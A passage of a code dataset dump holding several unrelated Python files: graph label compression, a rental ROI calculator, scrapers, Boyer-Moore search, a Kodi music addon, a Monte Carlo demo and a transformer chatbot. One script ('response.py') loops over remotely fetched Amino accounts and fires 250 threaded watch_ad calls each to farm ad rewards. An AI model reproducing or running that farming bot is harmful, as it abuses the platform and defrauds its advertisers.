plot(g)\n\nclass LabelCompression:\n\n def __init__(self):\n self.HASH = dict()\n self.HASH['index'] = '0'\n\n def getHASH(self):\n return self.HASH\n\n def createTestGraph(self):\n testGraph = Graph.GRG(10, 0.2)\n i = 1\n for v in testGraph.vs:\n v[Labels.CURRENT_LABEL_STR] = str(i%3 + 1)\n i = i + 1\n\n testGraph['name'] = 'LGtest'\n return testGraph\n\n def compress(self, g):\n labels = []\n labels = [ v[Labels.CURRENT_LABEL_STR] for v in g.vs ]\n\n labels.sort()\n\n for s in labels:\n fs = -1\n if s not in self.HASH:\n currentIndex = self.HASH['index']\n newIndex = str(int(currentIndex) + 1)\n self.HASH['index'] = newIndex\n fs = newIndex\n self.HASH[s] = fs\n\n #relabelling\n for v in g.vs:\n v[Labels.PREV_LABEL] = self.HASH[v[Labels.CURRENT_LABEL_STR]]\n\n g.setOfNewlyCreatedLabels = set([ v[Labels.PREV_LABEL] for v in g.vs ])\n return g\n\n def testGraph(self):\n return self.testGraph\n\n","repo_name":"yogeshdixit41/Weisfeiler-Lehman-Graph-Isomorphism-Test-Implementation","sub_path":"Compression.py","file_name":"Compression.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"8512519224","text":"# income:\n # - rental income = 2000/month\n # total income = 2000/month\n\n# purchase price 200,000\n\n# expenses:\n # - taxes = 150/month\n # - insurance = 100/month\n # - utilities = 0/month\n # - elec\n # - water\n # - sewer\n # - gas\n # - hoa = 0/month\n # - lawn/snow = 0/month\n # - vacancy = 100/month\n # - repairs = 100/month\n # - capex = 100/month\n # - property mangement = 200/month\n # - mortgage = 860/month\n\n # total = 1610/month\n\n# cashflow = 390/month\n\n# cash on cash roi\n # - downpayment = 40,000\n # - closing costs = 3000\n # - rehab budget = 7000\n # - misc = 0\n # total investment = 50,000\n\n# anual cash flow = 4680\n\n# cash on cash roi = 9.36%\n\nclass CashOnCash():\n \"\"\"\n the purpose of this class is to provide information about cash on cash ROI \n for a rental property\n \"\"\"\n def __init__(self, income):\n self.income = income\n\n def expenses(\n self, taxes, insurance, vacancy, repairs, capex, property_management, \n mortgage, utilities = 0, hoa = 0, ls = 0):\n self.taxes = taxes\n self.insurance = insurance\n self.vacancy = vacancy\n self.repairs = repairs\n self.capex = capex\n self.property_management = property_management\n self.mortgage = mortgage\n self.utilities = utilities\n self.hoa = hoa\n self.ls = ls\n\n self.total = self.taxes + self.insurance + self.vacancy + self.repairs + self.capex \n self.total += self.property_management + self.mortgage + self.hoa + self.utilities + self.ls\n\n return self.total\n \n def cashflow(self):\n return self.income - self.total\n \n def invested(self):\n self.down = int(input(\"What was the down payment? \"))\n self.closing = int(input(\"What were the closing costs? \"))\n self.rehab = int(input(\"What was the rehab budget? \"))\n self.misc = int(input(\"What were the misc costs? 
\"))\n\n return self.down + self.closing + self.rehab + self.misc\n \n def anual_cashflow(self):\n return CashOnCash.cashflow(self) * 12\n \n def roi(self):\n self.roi = CashOnCash.anual_cashflow(self) / CashOnCash.invested(self)\n self.roi *= 100\n print(f\"\\nThe cash on cash ROI for this property is {self.roi}%\")\n \nincome = 2000\ntaxes = 150\ninsurance = 100\nutilities = 0\nhoa = 0\nlawn_snow = 0\nvacancy = 100\nrepairs = 100\ncapex = 100\nproperty_management = 200\nmortgage = 860\n\ndownpayment = 40000\nclosing_costs = 3000\nrehab_budget = 7000\nmisc = 0\n\nrental_property = CashOnCash(income)\n\nrental_property.expenses(taxes, insurance, vacancy, repairs, capex, property_management, mortgage)\nrental_property.cashflow()\nrental_property.anual_cashflow()\nrental_property.roi()\n\n","repo_name":"Quinn-Polnisch/module3_rental_roi","sub_path":"rental.py","file_name":"rental.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14786804259","text":"#! usr/bin/python3\n\n# MOVE MAJORITY OF CODE INTO SCRAPPER CLASS\n# remove if comment and nav to each page and find the comment total\n\nimport re\nimport requests as r\nimport dhtmlparser as d\nimport dryscrape\n\nign_content = r.get(\"http://www.ign.com\").content\ndom = d.parseString(ign_content)\n\narticles = dom.find(\"div\", {\"class\": \"listElmnt-blogItem\"})\nlatest_reviews = dom.find(\"div\", {\"class\": \"column-game\"})\n\nfor review in latest_reviews:\n link_review = re.findall( r'href=\"(.*?)\"', str(review) )\n heading_review = re.findall( r'class=\"game-title\">(.*?)<', str(review) )\n rating_review = re.findall( r'class=\"rating\">(.*?)<', str(review) )\n if rating_review:\n print (heading_review[0])\n print (rating_review[0])\n if link_review:\n sess = dryscrape.Session()\n sess.visit(link_review[0])\n response = sess.body()\n dom_link = d.parseString(response)\n find_comment = dom_link.find(\"div\", {\"class\": \"article-comments wrap\"})\n for comment in find_comment:\n amount = re.findall( r'(.*?)<', str(comment) )\n print (amount)\n \nfor article in articles:\n heading_article = re.findall( r'>(.*?)\\n

', str(article) )\n summary_article = re.findall( r'(.*?)\", text)\r\nprint(boyer_moore(text, pattern))\r\n","repo_name":"jaqlig/algorithms","sub_path":"String-searching/Boyer–Moore algorithm/boyer_moore.py","file_name":"boyer_moore.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37775017019","text":"import xbmcgui\n\nfrom inode import INode\nfrom debug import warn\nfrom gui.util import lang, getSetting\nfrom gui.util import getImage, notifyH, executeBuiltin, containerUpdate \nfrom node import getNode, Flag\nfrom renderer import renderer\nfrom api import api\nfrom exception import QobuzXbmcError as Qerror\nfrom cache import cache\nimport qobuz\n\ndialogHeading = lang(30081)\n\nclass Node_favorites(INode):\n '''Displaying user favorites (track and album)\n '''\n def __init__(self, parent=None, parameters=None):\n super(Node_favorites, self).__init__(parent, parameters)\n self.nt = Flag.FAVORITES\n self.set_label(lang(30079))\n self.name = lang(30079)\n self.label = lang(30079)\n self.content_type = 'albums'\n self.image = getImage('favorites')\n self.offset = self.get_parameter('offset') or 0\n\n def fetch(self, Dir, lvl, whiteFlag, blackFlag):\n limit = getSetting('pagination_limit')\n data = api.get('/favorite/getUserFavorites', \n user_id=api.user_id, \n limit=limit, \n offset=self.offset)\n if not data:\n warn(self, \"Build-down: Cannot fetch favorites data\")\n return False\n self.data = data\n return True\n\n def populate(self, Dir, lvl, whiteFlag, blackFlag):\n if 'artists' in self.data:\n self.__populate_artists(Dir, lvl, whiteFlag, blackFlag) \n if 'albums' in self.data:\n self.__populate_albums(Dir, lvl, whiteFlag, blackFlag)\n if 'tracks' in self.data:\n self.__populate_tracks(Dir, lvl, whiteFlag, blackFlag)\n return True\n\n def __populate_tracks(self, Dir, lvl, whiteFlag, blackFlag):\n for track in self.data['tracks']['items']:\n node = getNode(Flag.TRACK)\n node.data = track\n self.add_child(node)\n\n def __populate_albums(self, Dir, lvl, whiteFlag, blackFlag):\n for album in self.data['albums']['items']:\n node = getNode(Flag.ALBUM)\n node.data = album\n self.add_child(node)\n \n def __populate_artists(self, Dir, lvl, whiteFlag, blackFlag):\n for artist in self.data['artists']['items']:\n node = getNode(Flag.ARTIST)\n node.data = artist\n node.fetch(None, None, None, Flag.NONE)\n self.add_child(node)\n\n def get_description(self):\n return self.get_property('description')\n\n def gui_add_albums(self):\n qnt, qid = int(self.get_parameter('qnt')), self.get_parameter('qid')\n nodes = self.list_albums(qnt, qid)\n if len(nodes) == 0:\n notifyH(dialogHeading, lang(36004))\n return False\n ret = xbmcgui.Dialog().select(lang(36005), [\n node.get_label() for node in nodes \n ])\n if ret == -1:\n return False\n album_ids = ','.join([node.nid for node in nodes])\n if not self.add_albums(album_ids):\n notifyH(dialogHeading, 'Cannot add album(s) to favorite')\n return False\n notifyH(dialogHeading, 'Album(s) added to favorite')\n return True\n\n def gui_add_artists(self):\n qnt, qid = int(self.get_parameter('qnt')), self.get_parameter('qid')\n nodes = self.list_artists(qnt, qid)\n if len(nodes) == 0:\n notifyH(dialogHeading, lang(36004))\n return False\n ret = xbmcgui.Dialog().select(lang(36007), [\n node.get_label() for node in nodes \n ])\n if ret == -1:\n return False\n artist_ids = ','.join([str(node.nid) for node in nodes])\n if not self.add_artists(artist_ids):\n 
notifyH(dialogHeading, 'Cannot add artist(s) to favorite')\n return False\n notifyH(dialogHeading, 'Artist(s) added to favorite')\n return True\n \n\n def list_albums(self, qnt, qid):\n album_ids = {}\n nodes = []\n if qnt & Flag.ALBUM == Flag.ALBUM:\n node = getNode(Flag.ALBUM, {'nid': qid})\n node.fetch(None, None, None, None)\n album_ids[str(node.nid)] = 1\n nodes.append(node)\n elif qnt & Flag.TRACK == Flag.TRACK:\n render = renderer(qnt, self.parameters)\n render.depth = 1\n render.whiteFlag = Flag.TRACK\n render.blackFlag = Flag.NONE\n render.asList = True\n render.run()\n if len(render.nodes) > 0:\n node = getNode(Flag.ALBUM)\n node.data = render.nodes[0].data['album']\n album_ids[str(node.nid)] = 1\n nodes.append(node)\n else:\n render = renderer(qnt, self.parameters)\n render.depth = -1\n render.whiteFlag = Flag.ALBUM\n render.blackFlag = Flag.STOPBUILD & Flag.TRACK\n render.asList = True\n render.run()\n for node in render.nodes:\n if node.nt & Flag.ALBUM: \n if not str(node.nid) in album_ids:\n album_ids[str(node.nid)] = 1\n nodes.append(node)\n if node.nt & Flag.TRACK:\n render = renderer(qnt, self.parameters)\n render.depth = 1\n render.whiteFlag = Flag.TRACK\n render.blackFlag = Flag.NONE\n render.asList = True\n render.run()\n if len(render.nodes) > 0:\n newnode = getNode(Flag.ALBUM)\n newnode.data = render.nodes[0].data['album']\n if not str(newnode.nid) in album_ids:\n nodes.append(newnode)\n album_ids[str(newnode.nid)] = 1\n return nodes\n\n def add_albums(self, album_ids):\n ret = api.favorite_create(album_ids=album_ids)\n if not ret:\n return False\n self._delete_cache()\n return True\n \n def add_artists(self, artist_ids):\n ret = api.favorite_create(artist_ids=artist_ids)\n if not ret:\n return False\n self._delete_cache()\n return True\n\n def gui_add_tracks(self):\n qnt, qid = int(self.get_parameter('qnt')), self.get_parameter('qid')\n nodes = self.list_tracks(qnt, qid)\n if len(nodes) == 0:\n notifyH(dialogHeading, lang(3600))\n return False\n ret = xbmcgui.Dialog().select(lang(36006), [\n node.get_label() for node in nodes \n ])\n if ret == -1:\n return False\n track_ids = ','.join([str(node.nid) for node in nodes])\n if not self.add_tracks(track_ids):\n notifyH(dialogHeading, 'Cannot add track(s) to favorite')\n return False\n notifyH(dialogHeading, 'Track(s) added to favorite')\n return True\n\n def list_tracks(self, qnt, qid):\n track_ids = {}\n nodes = []\n if qnt & Flag.TRACK == Flag.TRACK:\n node = getNode(Flag.TRACK, {'nid': qid})\n node.fetch(None, None, None, Flag.NONE)\n track_ids[str(node.nid)] = 1\n nodes.append(node)\n else:\n render = renderer(qnt, self.parameters)\n render.depth = -1\n render.whiteFlag = Flag.TRACK\n render.asList = True\n render.run()\n for node in render.nodes:\n if not str(node.nid) in track_ids:\n nodes.append(node)\n track_ids[str(node.nid)] = 1\n return nodes\n\n def list_artists(self, qnt, qid):\n artist_ids = {}\n nodes = []\n if qnt & Flag.ARTIST == Flag.ARTIST:\n node = getNode(Flag.ARTIST, {'nid': qid})\n node.fetch(None, None, None, Flag.NONE)\n artist_ids[str(node.nid)] = 1\n nodes.append(node)\n else:\n render = renderer(qnt, self.parameters)\n render.depth = -1\n render.whiteFlag = Flag.ALBUM & Flag.TRACK\n render.blackFlag = Flag.TRACK & Flag.STOPBUILD\n render.asList = True\n render.run()\n for node in render.nodes:\n artist = getNode(Flag.ARTIST, {'nid': node.get_artist_id()})\n if not artist.fetch(None, None, None, Flag.NONE):\n continue\n if not str(artist.nid) in artist_ids:\n nodes.append(artist)\n 
artist_ids[str(artist.nid)] = 1\n return nodes\n\n def add_tracks(self, track_ids):\n ret = api.favorite_create(track_ids=track_ids)\n if not ret:\n return False\n self._delete_cache()\n return True\n\n def _delete_cache(self):\n limit = getSetting('pagination_limit')\n key = cache.make_key('/favorite/getUserFavorites', \n user_id=api.user_id, \n limit=limit, \n offset=self.offset)\n return cache.delete(key)\n\n def del_track(self, track_id):\n if api.favorite_delete(track_ids=track_id):\n self._delete_cache()\n return True\n return False\n\n def del_album(self, album_id):\n if api.favorite_delete(album_ids=album_id):\n self._delete_cache()\n return True\n return False\n\n def del_artist(self, artist_id):\n if api.favorite_delete(artist_ids=artist_id):\n self._delete_cache()\n return True\n return False\n\n def gui_remove(self):\n qnt, qid = int(self.get_parameter('qnt')), self.get_parameter('qid')\n node = getNode(qnt, {'nid': qid})\n ret = None\n if qnt & Flag.TRACK == Flag.TRACK:\n ret = self.del_track(node.nid)\n elif qnt & Flag.ALBUM == Flag.ALBUM:\n ret = self.del_album(node.nid)\n elif qnt & Flag.ARTIST == Flag.ARTIST:\n ret = self.del_artist(node.nid)\n else:\n raise Qerror(who=self, what='invalid_node_type', \n additional=self.nt)\n if not ret:\n notifyH(dialogHeading, \n 'Cannot remove item: %s' % (node.get_label()))\n return False\n notifyH(dialogHeading, \n 'Item successfully removed: %s' % (node.get_label()))\n url = self.make_url(nt=self.nt, nid='', nm='')\n executeBuiltin(containerUpdate(url, True))\n return True\n","repo_name":"tidalf/dc.xbmc.addons","sub_path":"plugin.audio.qobuz/resources/lib/qobuz/node/favorites.py","file_name":"favorites.py","file_ext":"py","file_size_in_byte":10554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71073506012","text":"import os\n\ndef isescape(view):\n if (view[0][1] == 'e'):\n return(4)\n elif (view[1][0] == 'e'):\n return(2)\n elif (view[2][1] == 'e'):\n return(3)\n elif (view[1][2] == 'e'):\n return(1)\n else:\n return (0)\nfn = \"dirtdi\"\ndef tkt(view):\n if view == [\"---\",\"---\",\"--#\"] and not os.path.exists(fn):\n fh = open(fn, \"w\")\n fh.writelines(\"okokok\")\n fh.close()\n return(1)\n else:\n return(0)\naction = [\"RIGHT\",\"LEFT\", \"DOWN\", \"UP\"]\n\nn = input()\nview = [input() for i in range(3)]\nesc = isescape(view)\nif (esc):\n res = esc - 1\nelif(tkt(view)):\n res = 0\nelif (view[0][1] == '-'):\n res = 3\nelif (view[1][0] == '-'):\n res = 1\nelif (view[2][1] == '-'):\n res = 2\nelse:\n res = 0\nprint(action[res])\n","repo_name":"lvoneduval/hackerrank","sub_path":"Artificial_intelligence/Bot_Building/06_Maze_Escape.py","file_name":"06_Maze_Escape.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43914517000","text":"import collections\nimport random\nimport numpy as np\nfrom .. import McBase\n\n\nclass Exponential(McBase):\n\n    \"\"\"\n    This class defines a survival game, i.e., each round has p death rate.\n    p is very small: it is the per-turn mortality rate (e.g., the probability that a capacitor breaks down per unit of time).\n    We define this survival game to illustrate the underlying mechanism of the exponential distribution. Because the sudden death game can approximate many real-life accidents or electronic component failures (e.g., capacitor breakdown or LCD pixel defects), the resulting exponential distribution can be used in survival analysis and lifespan estimation. In each round of this survival game, the test subject (player) is faced with a very low sudden death probability (p).\n    If you choose p = 0.001 and simulate 10,000 MC rounds, the generated histogram is very close to the exponential distribution. This function can be used to illustrate the generation mechanism of the exponential distribution.\n    \n    p(x) = $ 1/\\theta * exp(-x/\\theta) $ , if x > 0\n    \"\"\"\n\n    def __init__(self, N=10000, n=1000, p=0.01):\n        '''\n        Parameters\n        ----------\n        n : survival game rounds\n        p : The probability of sudden death / failure / accident per round\n        '''\n        super().__init__(\"expon\", N)\n        self.num_rounds = n\n        self.p = p\n\n    def run(self, display=True):\n        survival_rounds = []\n        for _ in range(self.N):\n            fate = random.choices([0, 1], weights=(1-self.p, self.p), k=self.num_rounds)\n            if 1 in fate:\n                survival_rounds.append(fate.index(1))\n            # else: # still lives, i.e., > num_rounds\n            # survival_rounds.append(num_rounds)\n\n        c = collections.Counter(survival_rounds)\n        x_theory = range(np.array(list(c.keys())).min(), np.array(list(c.keys())).max() + 1)\n        theory = super().init_theory(dist=self.dist, x_theory=x_theory, p=self.p)\n\n        if display:\n            super().bar(x=c.keys(), y=c.values(), title=\"Frequency Histogram\\nper-round sudden death probability p=\" +\n                str(self.p) + ', game rounds = ' + str(self.num_rounds) + ', simulations = ' + str(self.N), draw_points=False)\n            super().plot(x=x_theory, y=theory, label='θ=' + str(round(1 / self.p + 0.5)),\n                title='Theoretical Distribution\\nexponential(θ=' + str(round(1 / self.p + 0.5)) + ')')\n","repo_name":"zhangys11/mc","sub_path":"src/mc/distributions/_exponential.py","file_name":"_exponential.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"21279423134","text":"# Convert 'chatbot_demo.ipynb' to a single file.\n# Ref.: https://doheon.github.io/%EC%BD%94%EB%93%9C%EA%B5%AC%ED%98%84/nlp/ci-chatbot-post/\n\nimport torch\nimport torch.nn as nn\nimport pandas as pd\nimport re\nimport urllib.request\nimport sentencepiece as spm\nimport numpy as np\nfrom tqdm import tqdm\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\npd.set_option('mode.chained_assignment', None) # ignore the SettingWithCopyWarning\n\n\"\"\"\nPreprocess part\n\"\"\"\nclass Preprocess:\n    def __init__(self):\n        # urllib.request.urlretrieve(\"https://raw.githubusercontent.com/songys/Chatbot_data/master/ChatbotData.csv\", filename=\"ChatBotData.csv\")\n        # self.train_data = pd.read_csv('ChatBotData.csv')\n        self.train_data = pd.read_csv(\"KETI_대화데이터_응급상황.txt\", sep='\\t', names=[\"index\", \"Q\"])\n        self.train_data['A'] = self.train_data['Q'].iloc[1:]\n        for i in range(len(self.train_data)-1):\n            self.train_data['A'].iloc[i] = self.train_data['A'].iloc[i+1]\n        self.train_data = self.train_data.iloc[:-1]\n        self.train_data.to_csv(\"./KETI_대화데이터_응급상황_QA.csv\", sep=',', index=False)\n\n    def remove_punctuation(self):\n        print(\"Train data samples: \\n\", self.train_data.head())\n        print(\"Number of chatbot samples: \", len(self.train_data), '\\n')\n        print(\"Number of missing values: \\n\", self.train_data.isnull().sum())\n\n        # put spaces around punctuation\n        questions = []\n        for sentence in self.train_data['Q']:\n            sentence = re.sub(r\"([?.!,])\", r\" \\1 \", 
sentence)\n            sentence = sentence.strip()\n            questions.append(sentence)\n\n        answers = []\n        for sentence in self.train_data['A']:\n            sentence = re.sub(r\"([?.!,])\", r\" \\1 \", sentence)\n            sentence = sentence.strip()\n            answers.append(sentence)\n\n        return questions, answers\n\n    # A way to tokenize directly, without using the BERT pretrained tokenizer.\n    def sent_piece(self, corpus):\n        prefix = \"chatbot\"\n        vocab_size = 8000\n        spm.SentencePieceTrainer.train(\n            f\"--input={corpus} --model_prefix={prefix} --vocab_size={vocab_size + 7}\" +\n            \" --model_type=bpe\" +\n            \" --max_sentence_length=999999\" +\n            \" --pad_id=0 --pad_piece=[PAD]\" + # pad (0)\n            \" --unk_id=1 --unk_piece=[UNK]\" + # unknown (1)\n            \" --bos_id=2 --bos_piece=[BOS]\" + # begin of sequence (2)\n            \" --eos_id=3 --eos_piece=[EOS]\" + # end of sequence (3)\n            \" --user_defined_symbols=[SEP],[CLS],[MASK]\") # user-defined tokens\n\n        vocab_file = \"chatbot.model\"\n        vocab = spm.SentencePieceProcessor()\n        vocab.load(vocab_file)\n        line = \"안녕하세요 만나서 반갑습니다\" # Example\n        pieces = vocab.encode_as_pieces(line) # token = piece\n        ids = vocab.encode_as_ids(line) # list of word ids for the pieces (tokens)\n\n        print(\"[Result Example]\")\n        print(\"Query: \", line)\n        print(\"Piece(token): \", pieces)\n        print(\"Id: \", ids)\n\n        return vocab\n\n    # Encode a given sentence into integers using the trained vocab\n    # tokenization / integer encoding / add start and end tokens / padding\n    def tokenize_and_filter(self, inputs, outputs, MAX_LENGTH, vocab):\n        START_TOKEN = [2]\n        END_TOKEN = [3]\n\n        tokenized_inputs, tokenized_outputs = [], []\n\n        for (sentence1, sentence2) in zip(inputs, outputs):\n            # encode (tokenization + integer encoding), then add start and end tokens\n            zeros1 = np.zeros(MAX_LENGTH, dtype=int)\n            zeros2 = np.zeros(MAX_LENGTH, dtype=int)\n            sentence1 = START_TOKEN + vocab.encode_as_ids(sentence1) + END_TOKEN\n            zeros1[:len(sentence1)] = sentence1[:MAX_LENGTH]\n\n            sentence2 = START_TOKEN + vocab.encode_as_ids(sentence2) + END_TOKEN\n            zeros2[:len(sentence2)] = sentence2[:MAX_LENGTH]\n\n            tokenized_inputs.append(zeros1)\n            tokenized_outputs.append(zeros2)\n\n        return tokenized_inputs, tokenized_outputs\n\n\n\"\"\"\nDataset part\n\"\"\"\nfrom torch.utils.data import Dataset, DataLoader\n\n\nclass SequenceDataset(Dataset):\n    def __init__(self, questions, answers):\n        questions = np.array(questions)\n        answers = np.array(answers)\n        self.inputs = questions\n        self.dec_inputs = answers[:, :-1]\n        self.outputs = answers[:, 1:]\n        self.length = len(questions)\n\n    def __getitem__(self, idx):\n        return (self.inputs[idx], self.dec_inputs[idx], self.outputs[idx])\n\n    def __len__(self):\n        return self.length\n\n\n\"\"\"\nModel part\n\"\"\"\nimport torch\nimport torch.nn as nn\nfrom torch.nn import Transformer\nimport math\n\nclass ChatbotModel(nn.Module):\n    # ntoken: vocab size\n    # embed: embedding size\n    # nhead: number of heads\n    # hidden: feedforward dimension\n    # nlayers: number of layers\n    def __init__(self, ntoken, embed, nhead, hidden, nlayers, dropout=0.5):\n        super(ChatbotModel, self).__init__()\n        self.transformer = Transformer(embed, nhead, dim_feedforward=hidden, num_encoder_layers=nlayers, num_decoder_layers=nlayers, dropout=dropout)\n        self.pos_encoder = PositionalEncoding(embed, dropout)\n        self.encoder = nn.Embedding(ntoken, embed)\n\n        self.pos_encoder_d = PositionalEncoding(embed, dropout)\n        self.encoder_d = nn.Embedding(ntoken, embed)\n\n        self.embed = embed\n        self.ntoken = ntoken\n        self.linear = nn.Linear(embed, ntoken)\n        self.init_weights()\n\n    def generate_square_subsequent_mask(self, sz):\n        mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n        mask = mask.float().masked_fill(mask == 0, 
float('-inf')).masked_fill(mask == 1, float(0.0))\n\n        return mask\n\n    def init_weights(self):\n        initrange = 0.1\n        self.encoder.weight.data.uniform_(-initrange, initrange)\n\n    def forward(self, src, tgt, srcmask, tgtmask, srcpadmask, tgtpadmask):\n        src = self.encoder(src) * math.sqrt(self.embed)\n        src = self.pos_encoder(src)\n\n        tgt = self.encoder_d(tgt) * math.sqrt(self.embed)\n        tgt = self.pos_encoder_d(tgt)\n\n        output = self.transformer(src.transpose(0,1), tgt.transpose(0,1), srcmask, tgtmask, src_key_padding_mask=srcpadmask, tgt_key_padding_mask=tgtpadmask)\n        output = self.linear(output)\n        return output\n\n\ndef gen_attention_mask(x):\n    mask = torch.eq(x, 0)\n    return mask\n\n\nclass PositionalEncoding(nn.Module):\n    def __init__(self, d_model, dropout=0.1, max_len=5000):\n        super(PositionalEncoding, self).__init__()\n        self.dropout = nn.Dropout(p=dropout)\n\n        pe = torch.zeros(max_len, d_model)\n        position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n        div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\n        pe[:, 0::2] = torch.sin(position * div_term)\n        pe[:, 1::2] = torch.cos(position * div_term)\n        pe = pe.unsqueeze(0).transpose(0,1)\n        self.register_buffer('pe', pe)\n\n    def forward(self, x):\n        x = x + self.pe[:x.size(0), :]\n        return self.dropout(x)\n\n\ndef preprocess_sentence(sentence):\n    sentence = re.sub(r\"([?.!,])\", r\" \\1 \", sentence)\n    sentence = sentence.strip()\n    return sentence\n\n\ndef train():\n    MAX_LENGTH = 40\n    BATCH_SIZE = 64\n    lr = 1e-4\n    epoch = 100\n    vocab_size = 8000\n\n\n    pre = Preprocess()\n    questions, answers = pre.remove_punctuation()\n\n    # Slice the csv line by line and write it out as txt\n    with open('all.txt', 'w', encoding='utf8') as f:\n        f.write('\\n'.join(questions))\n        f.write('\\n'.join(answers))\n\n    vocab = pre.sent_piece(\"all.txt\")\n\n    questions_encode, answers_encode = pre.tokenize_and_filter(questions, answers, MAX_LENGTH, vocab)\n    print(\"Question encoded example: \", questions_encode[0])\n    print(\"Answer encoded example: \", answers_encode[0])\n\n    dataset = SequenceDataset(questions_encode, answers_encode)\n    dataloader = DataLoader(dataset, shuffle=True, batch_size=BATCH_SIZE)\n\n    model = ChatbotModel(vocab_size+7, 256, 8, 512, 2, 0.2).to(device)\n    criterion = nn.CrossEntropyLoss()\n    optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n\n    model.train()\n\n    for i in range(epoch):\n        batchloss = 0.0\n\n        progress = tqdm(dataloader)\n        for (inputs, dec_inputs, outputs) in progress:\n            optimizer.zero_grad()\n            src_mask = model.generate_square_subsequent_mask(MAX_LENGTH).to(device)\n            src_padding_mask = gen_attention_mask(inputs).to(device)\n            tgt_mask = model.generate_square_subsequent_mask(MAX_LENGTH-1).to(device)\n            tgt_padding_mask = gen_attention_mask(dec_inputs).to(device)\n\n            result = model(inputs.to(device), dec_inputs.to(device), src_mask,\n                tgt_mask, src_padding_mask, tgt_padding_mask)\n            loss = criterion(result.permute(1, 2, 0), outputs.to(device).long())\n            progress.set_description(\"{:0.3f}\".format(loss))\n            loss.backward()\n            optimizer.step()\n            batchloss += loss\n        print(\"epoch:\", i + 1, \"|\", \"loss:\", batchloss.cpu().item() / len(dataloader))\n\n    return vocab, model\n\n\ndef evaluate(sentence, vocab, model):\n    START_TOKEN = [2]\n    END_TOKEN = [3]\n    MAX_LENGTH = 40\n\n    sentence = preprocess_sentence(sentence)\n    input = torch.tensor([START_TOKEN + vocab.encode_as_ids(sentence) + END_TOKEN]).to(device)\n    output = torch.tensor([START_TOKEN]).to(device)\n\n    # Start decoder prediction\n    model.eval()\n    for i in range(MAX_LENGTH):\n        src_mask 
= model.generate_square_subsequent_mask(input.shape[1]).to(device)\n        tgt_mask = model.generate_square_subsequent_mask(output.shape[1]).to(device)\n\n        src_padding_mask = gen_attention_mask(input).to(device)\n        tgt_padding_mask = gen_attention_mask(output).to(device)\n\n        predictions = model(input, output, src_mask, tgt_mask, src_padding_mask, tgt_padding_mask).transpose(0, 1)\n        # Get the predicted word at the current (last) time step.\n        predictions = predictions[:, -1:, :]\n        predicted_id = torch.LongTensor(torch.argmax(predictions.cpu(), axis=-1))\n\n\n        # If the predicted word at the last time step is the end token, stop predicting\n        if torch.equal(predicted_id[0][0], torch.tensor(END_TOKEN[0])):\n            break\n\n        # Append the predicted word at the last time step to the output.\n        # It will be fed back as the decoder input through this for loop.\n        output = torch.cat([output, predicted_id.to(device)], axis=1)\n\n    return torch.squeeze(output, axis=0).cpu().numpy()\n\n\ndef predict(sentence, vocab, model):\n    vocab_size = 8000\n    prediction = evaluate(sentence, vocab, model)\n    predicted_sentence = vocab.Decode(list(map(int, [i for i in prediction if i < vocab_size + 7])))\n\n    # print('Input: {}'.format(sentence))\n    print('Chatbot: {}'.format(predicted_sentence))\n    print()\n\n    return predicted_sentence\n\nif __name__ == '__main__':\n    vocab, model = train()\n    data = pd.read_csv(\"KETI_대화데이터_응급상황_QA.csv\")\n    data = data[data['Q'].str.contains('\\?')]['Q']\n\n\n    is_init = True\n    # Get user input\n    while True:\n        if is_init:\n            idx = np.random.randint(0, len(data)-1, size=1)\n            print(\"Chatbot: \", data.iloc[idx])\n            is_init = False\n        query = input(\"You say: \")\n\n        if query == \"exit\":\n            break\n\n        result = predict(query, vocab, model)\n\n        # print(\"Chatbot: \", result)\n        # print(result)\n\n\n\n\n","repo_name":"ParkJun-Yeong/AlzheimerDetection","sub_path":"demo/chatbot_demo.py","file_name":"chatbot_demo.py","file_ext":"py","file_size_in_byte":11729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"19804902506","text":"import samino\r\nfrom urllib.request import urlopen\r\nfrom threading import Thread\r\n\r\nwhile True:\r\n    print(\"v2 session...\")\r\n    \r\n    f = urlopen(\"https://aarrgh.000webhostapp.com/doctxt/links.txt\")\r\n    for l in f.readlines():\r\n        us = l.decode('utf-8')\r\n        cut = us.index(\"#\")\r\n        cutend = us.index(\";\")\r\n        link = us[0:cut]\r\n        did = us[cut+1:cutend]\r\n        print(link)\r\n        print(did)\r\n        try:\r\n            client=samino.Client(deviceId=did)\r\n            uid=client.get_from_link(link).objectId\r\n\r\n            def c():\r\n                client.watch_ad(uid)\r\n\r\n            for _ in range(250):\r\n                Thread(target=c).start() \r\n        except Exception as er:\r\n            print(er)\r\n","repo_name":"dandanpy/ftpamino","sub_path":"response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3084470358","text":"import Function as F\r\n\r\nF.go_url()\r\nitem_list = F.control_dict['tag'](\"td\")\r\nprint(\"item_list = \", len(item_list))\r\nindex = 0\r\nwhile index < 328:\r\n    name_company = item_list[index].text\r\n    item_list[index].click()\r\n    data = F.control_dict['tag'](\"time\")\r\n    data_1 = data[1].text\r\n    data_2 = data[2].text\r\n    data_3 = data[3].text\r\n    F.control_dict['class']('inv-link' and 'text-secondary' and 'font-bold' and 'text-sm' and 'whitespace-normal', 0, 'click')\r\n    if F.control_dict['class']('bp3-portal'):\r\n        news = F.control_dict['class']('text-base')\r\n    else:\r\n        news = F.control_dict['class']('WYSIWYG' and 'articlePage')\r\n    text_1 = ''\r\n    for i in range(0, 